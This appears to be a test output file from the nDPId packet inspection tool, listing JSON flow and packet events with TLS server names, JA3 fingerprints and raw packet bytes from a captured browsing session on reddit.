-01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2382,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01336{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2390,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","server_names":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, 
O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=Twitter Security, CN=platform.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"2B:30:10:3B:07:2F:F2:EB:3D:08:E3:BB:45:61:F7:A3:9F:4C:A7:92"}} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687642,"flow_last_seen":1605291687642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687642,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1605291687642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687642,"pkt":"qtsDr8lk5EKm5WPyht1gDI7+ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAImmABu4PHuxgAAAAAoAL9IGTNAAACBAWgBAIICsL4XLwAAAAAAQMDBw=="} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2543,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1605291687676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687676,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAgqAcsBIEmLB5kd7IUo3\/YpAbuaYOcfuuGDx7sZoBJXgGbFAAACBAV4AQMDAwQCCArC1z7qwvhcvA=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2544,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1605291687676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687676,"pkt":"qtsDr8lk5EKm5WPyht1gDI7+ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAImmABu4PHuxnnH7rigBAB++qzAAABAQgKwvhc38LXPuo="} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2546,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687642,"flow_last_seen":1605291687678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687678,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687642,"flow_last_seen":1605291687721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291687721,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2578,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687761,"flow_last_seen":1605291687761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2578,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1605291687761,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687761,"pkt":"qtsDr8lk5EKm5WPyht1gCTrZACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7PRgMoBuzRK2bcAAAAAoAL9IFSZAAACBAWgBAIIClvEqOkAAAAAAQMDBw=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2609,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1605291687790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687790,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGhTs9EqAcsBIEmLB5kd7IUo3\/YpAbuAylJzVUg0Stm4oBJXgFBhAAACBAV4AQMDAwQCCArC1z9gW8So6Q=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2610,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1605291687790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687790,"pkt":"qtsDr8lk5EKm5WPyht1gCTrZACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7PRgMoBuzRK2bhSc1VJgBAB+9RVAAABAQgKW8SpBsLXP2A="} 
-00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687761,"flow_last_seen":1605291687790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687790,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2616,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687800,"flow_last_seen":1605291687800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687800,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2616,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1605291687800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687800,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MN8MAAAAAoAL9IICJAAACBAWgBAIICk1+jVUAAAAAAQMDBw=="} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2645,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1605291687829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687829,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGj0KsgqAcsBIEmLB5kd7IUo3\/YpAbvdzp1dXkT\/jDfEoBJXgChEAAACBAV4AQMDAwQCCArC1z+HTX6NVQ=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2646,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1605291687829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687829,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MN8SdXV5FgBAB+6w4AAABAQgKTX6NcsLXP4c="} 
-00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2647,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687800,"flow_last_seen":1605291687829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687829,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00975{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2651,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687761,"flow_last_seen":1605291687852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687852,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687896,"flow_last_seen":1605291687896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687896,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1605291687896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687896,"pkt":"qtsDr8lk5EKm5WPyht1gD27HACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAieM+UmsoBu3fYetUAAAAAoAL9ICsYAAACBAWgBAIIClOdBf4AAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2916,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687931,"flow_last_seen":1605291687931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687931,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2916,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1605291687931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687931,"pkt":"qtsDr8lk5EKm5WPyht1gCkMmACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1k4Bu9FF0vYAAAAAoAL9ILpIAAACBAWgBAIICnCSuGYAAAAAAQMDBw=="} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2917,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1605291687932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687932,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAACJ4z5QqAcsBIEmLB5kd7IUo3\/YpAbuayhO+xPN32HrWoBJXgPVcAAACBAV4AQMDAwQCCArC1z\/tU50F\/g=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2918,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1605291687932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687932,"pkt":"qtsDr8lk5EKm5WPyht1gD27HACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAieM+UmsoBu3fYetYTvsT0gBAB+3lKAAABAQgKU50GIsLXP+0="} 
-00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2919,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687896,"flow_last_seen":1605291687933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2920,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687933,"flow_last_seen":1605291687933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2920,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1605291687933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687933,"pkt":"qtsDr8lk5EKm5WPyht1gBZTsACgGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIfkWUEn4fxCOvggBu9JG6EoAAAAAoAL9IFfFAAACBAWgBAIICteKYnsAAAAAAQMDBw=="} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2921,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687934,"flow_last_seen":1605291687934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687934,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2921,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1605291687934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687934,"pkt":"qtsDr8lk5EKm5WPyht1gA0MZACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAXNobxrOgBu0Y7yJAAAAAAoAL9ICibAAACBAWgBAIIClHJL\/gAAAAAAQMDBw=="} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2996,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1605291687966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687966,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvWTrVWRoTRRdL3oBJXgGFBAAACBAV4AQMDAwQCCArC10AQcJK4Zg=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2997,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1605291687966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687966,"pkt":"qtsDr8lk5EKm5WPyht1gCkMmACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1k4Bu9FF0ve1VkaFgBAB++UvAAABAQgKcJK4icLXQBA="} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2998,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687931,"flow_last_seen":1605291687966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1605291687974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687974,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYgARaADQAh+RZQSfh\/EI4qAcsBIEmLB5kd7IUo3\/YpAbu+CLYiE5XSRuhLoBJXgDDhAAACBAV4AQMDAwQCCArC10AQ14piew=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3002,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1605291687974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687974,"pkt":"qtsDr8lk5EKm5WPyht1gBZTsACAGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIfkWUEn4fxCOvggBu9JG6Eu2IhOWgBAB+7TJAAABAQgK14pipMLXQBA="} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3004,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687933,"flow_last_seen":1605291687974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687974,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3007,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1605291687975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687975,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAABc2hvEqAcsBIEmLB5kd7IUo3\/YpAbus6CNL5ddGO8iRoBJXgMJGAAACBAV4AQMDAwQCCArC10AVUckv+A=="} 